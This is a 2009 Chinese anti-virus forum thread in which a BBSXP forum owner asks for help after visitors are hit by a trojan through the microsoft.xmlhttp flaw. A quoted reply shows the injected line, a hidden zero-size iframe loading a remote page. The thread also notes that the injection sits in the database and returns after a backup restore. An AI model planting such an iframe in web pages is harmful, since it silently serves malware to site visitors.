瑞星卡卡安全论坛技术交流区反病毒/反流氓软件论坛 microsoft.xmlhttp的漏洞 被植入木马 请高手帮忙 万分感谢………

1   1  /  1  页   跳转

[求助] microsoft.xmlhttp的漏洞 被植入木马 请高手帮忙 万分感谢………

microsoft.xmlhttp的漏洞 被植入木马 请高手帮忙 万分感谢………

BBSXP 2008 BBSXP 2008 SP2 ACCESS 8.0.5.081208 已经有打过补丁的

租用的500M虚拟空间,这两天网友访问 说论坛有木马 我访问的时候也出现了 这个问题……

访问也有提示了 microsoft.xmlhttp的漏洞 请问该查询哪个文件程序? 来查看是否被植入代码?

IE 7打开页面后提示:360检测此网站时发现了什么问题?

第一次发现威胁日期是 2009-05-09 09:58:53

最后一次在此网站中发现可疑内容的日期是 2009-05-09 08:58:19

360云安全中心发现该网页含有会产生:

非法启动进程:"C:\DOCUME~1\ol\LOCALS~1\Temp\dllhost.exe"

"C:\DOCUME~1\ol\LOCALS~1\Temp\dllhost.exe"

"C:\DOCUME~1\ol\LOCALS~1\Temp\dllhost.exe"

请高手帮忙解决一下 万分感谢……






用户系统信息:Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
分享到:
gototop
 

回复:microsoft.xmlhttp的漏洞 被植入木马 请高手帮忙 万分感谢………

网址是www.PDAQQ.com/bbsxp (访问论坛才会 访问主页不会出现问题)
gototop
 

回复: microsoft.xmlhttp的漏洞 被植入木马 请高手帮忙 万分感谢………



引用:
原帖由 aaccbbdd 于 2009-5-9 16:44:00 发表
干掉该段代码

<iframe src=http://8878.nznz.net/1.htm width=0 height=0></iframe>


谢谢 高手指点 请问在那个文件干掉这个代码??是数据库里?还是论坛的程序内?

如果是程序有好多 ASP的 是一个一个找吗?万分感谢

请问这个程序代码是如何添加到网站的??我看了后台 只有我一个人在上传东西啊
最后编辑KFC奇奇 最后编辑于 2009-05-09 16:54:30
gototop
 

回复:microsoft.xmlhttp的漏洞 被植入木马 请高手帮忙 万分感谢………

看的发晕了 啥来的??
gototop
 

回复:microsoft.xmlhttp的漏洞 被植入木马 请高手帮忙 万分感谢………

XP SP2 运行后说 WINDOWS驱动器没有准备好 错误
gototop
 

回复:microsoft.xmlhttp的漏洞 被植入木马 请高手帮忙 万分感谢………

还是没有搞明白 唉 怎么办啊
gototop
 

回复:microsoft.xmlhttp的漏洞 被植入木马 请高手帮忙 万分感谢………

全杀了 没毒啊 是被注入到数据库了
gototop
 

回复:microsoft.xmlhttp的漏洞 被植入木马 请高手帮忙 万分感谢………

昨日恢复了4月23日的数据库备份文件 晚上访问就OK了 没有提示了

但是今天就又有了 我的天哪 怎么回事啊??
gototop
 
1   1  /  1  页   跳转
页面顶部
Powered by Discuz!NT